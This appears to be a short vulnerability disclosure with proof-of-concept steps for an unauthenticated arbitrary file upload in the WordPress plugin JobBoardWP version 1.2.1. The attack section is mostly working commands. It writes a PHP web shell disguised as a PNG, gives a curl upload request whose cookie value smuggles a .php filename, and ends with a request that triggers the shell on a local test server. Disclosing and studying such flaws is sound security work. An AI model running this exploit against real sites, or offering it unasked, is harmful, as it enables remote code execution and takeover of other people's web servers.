The plugin does not properly validate file names and types in its file upload functionalities, allowing unauthenticated users to upload arbitrary files such as PHP.
Setup:
1. Install the vulnerable plugin (jobboardwp version 1.2.1)
2. In the toast message that appears on the plugin's installation page, create the required pages for the plugin to work properly
Attack:
1. As an unauthenticated user, extract the nonce from the "Jobs" page (by default /?page_id=5), CTRL+F for "jb_front_data"
2. Prepare a payload you want to upload, ensure that the filename ends with ".png":
echo '<?php passthru("id"); ?>' > /tmp/payload.png
3. Invoke the following curl command, with the nonce embedded, to upload the payload:
curl 'http://127.0.0.1:7777/wp-admin/admin-ajax.php?action=jb-upload-company-logo' \
-H 'Cookie: jb-logo-upload=payload.php' \
-F 'nonce=<NONCE>' \
-F 'chunks=1' \
-F 'file=@/tmp/payload.png' \
4. Trigger the payload by accessing it (the location of the payload is returned by the curl command above):
curl 'http://127.0.0.1:7777/wp-content/uploads/jobboardwp/temp/payload.php'